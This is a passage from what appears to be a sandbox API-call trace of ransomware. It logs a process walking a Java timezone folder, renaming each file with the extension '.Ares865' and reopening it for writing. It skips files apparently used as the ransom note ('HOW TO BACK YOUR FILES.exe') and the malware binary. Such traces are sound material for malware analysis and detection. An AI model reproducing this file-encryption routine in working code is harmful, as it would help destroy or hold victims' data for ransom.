dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.311] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1204) returned 1 [0135.314] lstrcpyW (in: lpString1=0x2cce460, lpString2="Godthab" | out: lpString1="Godthab") returned="Godthab" [0135.314] lstrlenW (lpString="Godthab") returned 7 [0135.314] lstrlenW (lpString="Ares865") returned 7 [0135.315] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab.Ares865") returned 63 [0135.315] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\godthab"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\godthab.ares865"), dwFlags=0x1) returned 1 [0135.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\godthab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.316] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1036) returned 1 [0135.319] lstrcpyW (in: lpString1=0x2cce460, lpString2="Goose_Bay" | out: lpString1="Goose_Bay") returned="Goose_Bay" [0135.319] lstrlenW (lpString="Goose_Bay") returned 9 [0135.319] lstrlenW (lpString="Ares865") returned 7 [0135.319] lstrcmpiW (lpString1="ose_Bay", lpString2="Ares865") returned 1 [0135.319] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay.Ares865") returned 65 [0135.319] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\goose_bay"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\goose_bay.ares865"), dwFlags=0x1) returned 1 [0135.321] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\goose_bay.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.321] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1728) returned 1 [0135.324] lstrcpyW (in: lpString1=0x2cce460, lpString2="Grand_Turk" | out: lpString1="Grand_Turk") returned="Grand_Turk" [0135.324] lstrlenW (lpString="Grand_Turk") returned 10 [0135.324] lstrlenW (lpString="Ares865") returned 7 [0135.324] lstrcmpiW (lpString1="nd_Turk", lpString2="Ares865") returned 1 [0135.324] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk.Ares865") returned 66 [0135.325] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grand_turk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grand_turk.ares865"), dwFlags=0x1) returned 1 [0135.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grand_turk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.327] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1044) returned 1 [0135.329] lstrcpyW (in: lpString1=0x2cce460, lpString2="Grenada" | out: lpString1="Grenada") returned="Grenada" [0135.329] lstrlenW (lpString="Grenada") returned 7 [0135.329] lstrlenW (lpString="Ares865") returned 7 [0135.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada.Ares865") returned 63 [0135.330] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grenada"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grenada.ares865"), dwFlags=0x1) returned 1 [0135.331] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grenada.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.331] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.334] lstrcpyW (in: lpString1=0x2cce460, lpString2="Guadeloupe" | out: lpString1="Guadeloupe") returned="Guadeloupe" [0135.334] lstrlenW (lpString="Guadeloupe") returned 10 [0135.334] lstrlenW (lpString="Ares865") returned 7 [0135.334] lstrcmpiW (lpString1="deloupe", lpString2="Ares865") returned 1 [0135.335] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe.Ares865") returned 66 [0135.335] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guadeloupe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guadeloupe.ares865"), dwFlags=0x1) returned 1 [0135.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guadeloupe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guadeloupe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.336] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.342] lstrcpyW (in: lpString1=0x2cce460, lpString2="Guatemala" | out: lpString1="Guatemala") returned="Guatemala" [0135.342] lstrlenW (lpString="Guatemala") returned 9 [0135.342] lstrlenW (lpString="Ares865") returned 7 [0135.342] lstrcmpiW (lpString1="atemala", lpString2="Ares865") returned 1 [0135.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala.Ares865") returned 65 [0135.342] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guatemala"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guatemala.ares865"), dwFlags=0x1) returned 1 [0135.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guatemala.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.344] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0135.347] lstrcpyW (in: lpString1=0x2cce460, lpString2="Guayaquil" | out: lpString1="Guayaquil") returned="Guayaquil" [0135.347] lstrlenW (lpString="Guayaquil") returned 9 [0135.347] lstrlenW (lpString="Ares865") returned 7 [0135.347] lstrcmpiW (lpString1="ayaquil", lpString2="Ares865") returned 1 [0135.347] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil.Ares865") returned 65 [0135.347] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guayaquil"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guayaquil.ares865"), dwFlags=0x1) returned 1 [0135.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guayaquil.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.349] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.352] lstrcpyW (in: lpString1=0x2cce460, lpString2="Guyana" | out: lpString1="Guyana") returned="Guyana" [0135.352] lstrlenW (lpString="Guyana") returned 6 [0135.352] lstrlenW (lpString="Ares865") returned 7 [0135.352] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana.Ares865") returned 62 [0135.353] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guyana"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guyana.ares865"), dwFlags=0x1) returned 1 [0135.354] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guyana.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.354] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0135.361] lstrcpyW (in: lpString1=0x2cce460, lpString2="Halifax" | out: lpString1="Halifax") returned="Halifax" [0135.361] lstrlenW (lpString="Halifax") returned 7 [0135.361] lstrlenW (lpString="Ares865") returned 7 [0135.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax.Ares865") returned 63 [0135.361] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\halifax"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\halifax.ares865"), dwFlags=0x1) returned 1 [0135.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\halifax.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.363] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1908) returned 1 [0135.367] lstrcpyW (in: lpString1=0x2cce460, lpString2="Havana" | out: lpString1="Havana") returned="Havana" [0135.367] lstrlenW (lpString="Havana") returned 6 [0135.367] lstrlenW (lpString="Ares865") returned 7 [0135.367] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana.Ares865") returned 62 [0135.367] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\havana"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\havana.ares865"), dwFlags=0x1) returned 1 [0135.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\havana.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.369] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1340) returned 1 [0135.375] lstrcpyW (in: lpString1=0x2cce460, lpString2="Hermosillo" | out: lpString1="Hermosillo") returned="Hermosillo" [0135.375] lstrlenW (lpString="Hermosillo") returned 10 [0135.375] lstrlenW (lpString="Ares865") returned 7 [0135.375] lstrcmpiW (lpString1="mosillo", lpString2="Ares865") returned 1 [0135.375] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo.Ares865") returned 66 [0135.375] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\hermosillo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\hermosillo.ares865"), dwFlags=0x1) returned 1 [0135.377] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\hermosillo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.377] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=189) returned 1 [0135.380] lstrcpyW (in: lpString1=0x2cce460, lpString2="Indiana" | out: lpString1="Indiana") returned="Indiana" [0135.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0135.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4710 [0135.380] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0135.380] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7457b600, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7457b600, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7457b600, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Inuvik", cAlternateFileName="")) returned 1 [0135.380] lstrcmpiW (lpString1="Inuvik", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0135.380] lstrcmpiW (lpString1="Inuvik", lpString2="aoldtz.exe") returned 1 [0135.380] lstrcpyW (in: lpString1=0x2cce460, lpString2="Inuvik" | out: lpString1="Inuvik") returned="Inuvik" [0135.380] lstrlenW (lpString="Inuvik") returned 6 [0135.380] lstrlenW (lpString="Ares865") returned 7 [0135.381] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik.Ares865") returned 62 [0135.381] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\inuvik"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\inuvik.ares865"), dwFlags=0x1) returned 1 [0135.382] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\inuvik.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.382] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1060) returned 1 [0135.385] lstrcpyW (in: lpString1=0x2cce460, lpString2="Iqaluit" | out: lpString1="Iqaluit") returned="Iqaluit" [0135.385] lstrlenW (lpString="Iqaluit") returned 7 [0135.385] lstrlenW (lpString="Ares865") returned 7 [0135.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit.Ares865") returned 63 [0135.386] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\iqaluit"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\iqaluit.ares865"), dwFlags=0x1) returned 1 [0135.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\iqaluit.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.388] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1064) returned 1 [0135.391] lstrcpyW (in: lpString1=0x2cce460, lpString2="Jamaica" | out: lpString1="Jamaica") returned="Jamaica" [0135.391] lstrlenW (lpString="Jamaica") returned 7 [0135.391] lstrlenW (lpString="Ares865") returned 7 [0135.391] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica.Ares865") returned 63 [0135.391] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\jamaica"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\jamaica.ares865"), dwFlags=0x1) returned 1 [0135.392] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\jamaica.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.392] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=233) returned 1 [0135.396] lstrcpyW (in: lpString1=0x2cce460, lpString2="Juneau" | out: lpString1="Juneau") returned="Juneau" [0135.396] lstrlenW (lpString="Juneau") returned 6 [0135.396] lstrlenW (lpString="Ares865") returned 7 [0135.396] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau.Ares865") returned 62 [0135.396] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\juneau"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\juneau.ares865"), dwFlags=0x1) returned 1 [0135.397] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\juneau.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.398] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1224) returned 1 [0135.400] lstrcpyW (in: lpString1=0x2cce460, lpString2="Kentucky" | out: lpString1="Kentucky") returned="Kentucky" [0135.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0135.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1788 [0135.400] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0135.400] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7457b600, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7457b600, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7457b600, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x51, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="La_Paz", cAlternateFileName="")) returned 1 [0135.400] lstrcmpiW (lpString1="La_Paz", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0135.400] lstrcmpiW (lpString1="La_Paz", lpString2="aoldtz.exe") returned 1 [0135.401] lstrcpyW (in: lpString1=0x2cce460, lpString2="La_Paz" | out: lpString1="La_Paz") returned="La_Paz" [0135.401] lstrlenW (lpString="La_Paz") returned 6 [0135.401] lstrlenW (lpString="Ares865") returned 7 [0135.401] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz.Ares865") returned 62 [0135.401] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\la_paz"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\la_paz.ares865"), dwFlags=0x1) returned 1 [0135.402] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\la_paz.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.403] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81) returned 1 [0135.407] lstrcpyW (in: lpString1=0x2cce460, lpString2="Lima" | out: lpString1="Lima") returned="Lima" [0135.407] lstrlenW (lpString="Lima") returned 4 [0135.407] lstrlenW (lpString="Ares865") returned 7 [0135.407] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima.Ares865") returned 60 [0135.407] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\lima"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\lima.ares865"), dwFlags=0x1) returned 1 [0135.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\lima.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.409] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=185) returned 1 [0135.412] lstrcpyW (in: lpString1=0x2cce460, lpString2="Los_Angeles" | out: lpString1="Los_Angeles") returned="Los_Angeles" [0135.412] lstrlenW (lpString="Los_Angeles") returned 11 [0135.412] lstrlenW (lpString="Ares865") returned 7 [0135.412] lstrcmpiW (lpString1="Angeles", lpString2="Ares865") returned -1 [0135.413] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles.Ares865") returned 67 [0135.413] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\los_angeles"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\los_angeles.ares865"), dwFlags=0x1) returned 1 [0135.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\los_angeles.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.415] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1560) returned 1 [0135.417] lstrcpyW (in: lpString1=0x2cce460, lpString2="Maceio" | out: lpString1="Maceio") returned="Maceio" [0135.417] lstrlenW (lpString="Maceio") returned 6 [0135.417] lstrlenW (lpString="Ares865") returned 7 [0135.418] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio.Ares865") returned 62 [0135.418] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\maceio"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\maceio.ares865"), dwFlags=0x1) returned 1 [0135.419] CreateFileW (lpFileName="C:\\Program Files 